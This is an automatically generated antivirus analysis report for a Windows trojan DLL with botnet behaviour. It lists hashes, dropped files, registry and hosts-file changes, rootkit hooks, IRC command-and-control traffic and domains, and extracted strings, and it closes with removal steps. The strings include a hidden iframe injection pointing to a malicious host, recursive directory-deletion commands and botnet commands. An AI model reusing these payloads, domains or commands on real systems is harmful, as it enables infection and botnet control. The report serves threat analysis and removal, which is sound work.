Gen.Variant.Zusy.1287_fb38a2f15e
Trojan.Win32.MicroFake.ba (Kaspersky), Gen:Variant.Zusy.1287 (B) (Emsisoft), Gen:Variant.Zusy.1287 (AdAware), VirusVirut.YR, DDoSNitol.YR (Lavasoft MAS)
Behaviour: Trojan, Virus
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: fb38a2f15e2f8f9efc2d819e07d98298
SHA1: 7597ea48a003b3236b0749e044efdabfabbf9bc5
SHA256: 8991698e4b8bc7202267e04451cbd7fc3ca16bc70647318c6d6f6c1aa581bd04
SSDeep: 6144:fg0mAkyz90EieibQVqOZ167e831JBM5n22aLN0vZHn9XSbTRIVcBmPzLiQ8:fg0momeibQVqOZ1Oe831l2u4H9yTR2PH
Size: 382464 bytes
File type: DLL
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: StdLib
Created at: 2010-06-08 12:59:36
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
regsvr32.exe:3708
hrl76A5.tmp:3796
The Trojan injects its code into the following process(es):
imugmu.exe:3624
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process regsvr32.exe:3708 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\hrl76A5.tmp (750 bytes)
The process imugmu.exe:3624 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\RCX88FD.tmp (24748 bytes)
C:\Windows\System32\hra33.dll (7 bytes)
C:\Windows\Sys (385 bytes)
C:\Boot\lpk.dll (2105 bytes)
The process hrl76A5.tmp:3796 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\System32\imugmu.exe (2105 bytes)
Registry activity
The process hrl76A5.tmp:3796 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SOFTWARE.LOG,"
[HKLM\System\CurrentControlSet\Services\Distribujdw]
"Description" = "Distribuyor Transaction Coordinator Service."
Dropped PE files
| MD5 | File path |
|---|---|
| ae566755da91f252437cfe23f2956b52 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\SOFTWARE.LOG |
| ae566755da91f252437cfe23f2956b52 | c:\Windows\System32\imugmu.exe |
HOSTS file anomalies
The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 864 bytes in size. The following entries are added to the hosts file:
| IP address | Hostname |
|---|---|
| 127.0.0.1 | www.Brenz.pl |
| 127.0.0.1 | validation.sls.microsoft.com |
Rootkit activity
The Trojan installs the following user-mode hooks in ntdll.dll:
NtQueryInformationProcess
ZwOpenFile
NtDeviceIoControlFile
ZwCreateUserProcess
ZwCreateProcessEx
NtCreateProcess
ZwCreateFile
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 2860 | 3072 | 3.84593 | 8fe4715e1fa106a227c935d184e4ba85 |
| .rdata | 8192 | 2505 | 2560 | 3.36056 | 6951ee1a0ff3a7f5a44727b4713506a3 |
| .data | 12288 | 672 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 16384 | 374932 | 375296 | 5.1894 | 5e0a38c3b5805833df09d9142aeeffdd |
| .reloc | 393216 | 494 | 512 | 3.52939 | cfa8d04dd000bb30ab126902176ed40d |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| ilo.brenz.pl | |
| teredo.ipv6.microsoft.com | |
| dns.msftncsi.com | |
| lang12397007.2288.org | |
| bgigty.com | |
| rnasqh.com | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET TROJAN Known Hostile Domain ilo.brenz.pl Lookup
Traffic
.m.(.Z...`.....&*.)..#..G.......5..............iK&....{......./...W.]$
:irc 001 dnzstabb :Hi virtu.:irc 376 dnzstabb :End of /MOTD command.:i
rc 001 dnzstabb :Hi virtu.:irc 376 dnzstabb :End of /MOTD command..:dn
zstabb JOIN #.364..:dnzstabb JOIN #.364.
The Trojan connects to the servers at the following location(s):
.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
KERNEL32.dll
USER32.dll
msvcrt.dll
ole32.dll
ntdll.dll
COMCTL32.dll
w9..mMa
regsvr32.pdb
RegCloseKey
RegOpenKeyExW
_wcmdln
_amsg_exit
version="5.1.0.0"
name="Microsoft.Windows.RegSvr32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel
\regsvr32.exe
user32.dll
Excessive # of DLL's on cmdline
6.1.7600.16385 (win7_rtm.090713-1255)
REGSVR32.EXE
Windows
Operating System
6.1.7600.16385
imugmu.exe_3624:
.text
`.rdata
@.data
.rsrc
USER32.dll
ADVAPI32.dll
SHELL32.dll
WS2_32.dll
WINMM.dll
GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm
RegCloseKey
RegOpenKeyExA
RegOpenKeyA
ShellExecuteA
MFC42.DLL
MSVCRT.dll
_acmdln
WinExec
KERNEL32.dll
lang12397007.2288.org:1
-1838212312-1838212312
kernel32.dll
%u.%u.%u.%u
hra%u.dll
iexplore.exe
stf%c%c%c%c%c.exe
PlusCtrl.dll
SOFTWARE.LOG
%c%c%c%c%c%c.exe
%u MB
%u MHz
Windows NT
Windows 7
Windows 2008
Windows Vista
Windows 2003
Windows XP
Windows 2000
SOFTWARE\Microsoft\Windows NT\CurrentVersion
\Program Files\Internet Explorer\iexplore.exe
#0%s!
%s/%s
GET %s HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
Host: %s:%d
Host: %s
User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0
Referer: hXXp://%s:80/hXXp://%s
%s %s%s
User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
%d.%d.%d.%d
192.168.1.244
@.reloc
SHLWAPI.dll
lpk.dll
;>QH.FQ?$84
#.Ynd
.YdP)
.cXRDs
%F]`k
M%Dkv
,t.va
/Ma.Kf
ADVAPI32.DLL
JOIN #.%d
DSTAMP %ddd
\USERINIT.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
ilo.brenz.pl
ant.trenz.pl
NICK ugdxdwyw
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x *%s
KERNEL32.DLL
windowsupdate
drweb
NICK lkpyunnz
Rm/C.GI
oh.nigim.pl
jot.tasb.ru
be.difti.at
o2.play9.pl
knx.remp.pl
NICK keuuwyrk
M~%d'Jm
\?.mD
xun.ilgo.ru
hus.limp.pl
mgw.mugu.pl
c7.polgo.pl
lid.gbil.ru
NICK ljgondtd
NICK medulzsl
%.6x . . :%c%.8x%x %s
JOIN
127.0.0.1 VVV.Brenz.pl
#<iframe style="height:1px" src="hXXp://www.Brenz.pl/rc/" frameborder=0 width=1></iframe>
cmd /c RD /s /q "%s"
"%s" a -r -ep1"%s" "%s" "%s\lpk.dll"
"%s" x "%s" *.exe "%s\"
cmd /c %s vb "%s" lpk.dll|find /i "lpk.dll"
rar.exe
1, 0, 0, 1
server.EXE
imugmu.exe_3624_rwx_0041B000_00001000:
M%Dkv
imugmu.exe_3624_rwx_0042B000_00001000:
/Ma.Kf
imugmu.exe_3624_rwx_0042D000_00007000:
ADVAPI32.DLL
JOIN #.%d
DSTAMP %ddd
\USERINIT.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
ilo.brenz.pl
ant.trenz.pl
NICK ugdxdwyw
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x *%s
KERNEL32.DLL
windowsupdate
drweb
imugmu.exe_3624_rwx_00435000_00007000:
ADVAPI32.DLL
JOIN #.%d
DSTAMP %ddd
\USERINIT.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
ilo.brenz.pl
ant.trenz.pl
NICK lkpyunnz
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x *%s
KERNEL32.DLL
windowsupdate
drweb
imugmu.exe_3624_rwx_00442000_00008000:
ADVAPI32.DLL
JOIN #.%d
DSTAMP %ddd
\USERINIT.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
oh.nigim.pl
jot.tasb.ru
be.difti.at
o2.play9.pl
knx.remp.pl
NICK keuuwyrk
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x *%s
KERNEL32.DLL
windowsupdate
drweb
imugmu.exe_3624_rwx_00451000_00008000:
ADVAPI32.DLL
JOIN #.%d
DSTAMP %ddd
\USERINIT.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
xun.ilgo.ru
hus.limp.pl
mgw.mugu.pl
c7.polgo.pl
lid.gbil.ru
NICK ljgondtd
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x *%s
KERNEL32.DLL
windowsupdate
drweb
imugmu.exe_3624_rwx_0045A000_00007000:
ADVAPI32.DLL
DSTAMP %ddd
\USERINIT.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
ilo.brenz.pl
ant.trenz.pl
NICK medulzsl
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x %s
JOIN
127.0.0.1 VVV.Brenz.pl
#<iframe style="height:1px" src="hXXp://www.Brenz.pl/rc/" frameborder=0 width=1></iframe>
KERNEL32.DLL
windowsupdate
drweb
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
regsvr32.exe:3708
hrl76A5.tmp:3796
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\hrl76A5.tmp (750 bytes)
C:\RCX88FD.tmp (24748 bytes)
C:\Windows\System32\hra33.dll (7 bytes)
C:\Boot\lpk.dll (2105 bytes)
C:\Windows\System32\imugmu.exe (2105 bytes)
- Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
127.0.0.1 localhost
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.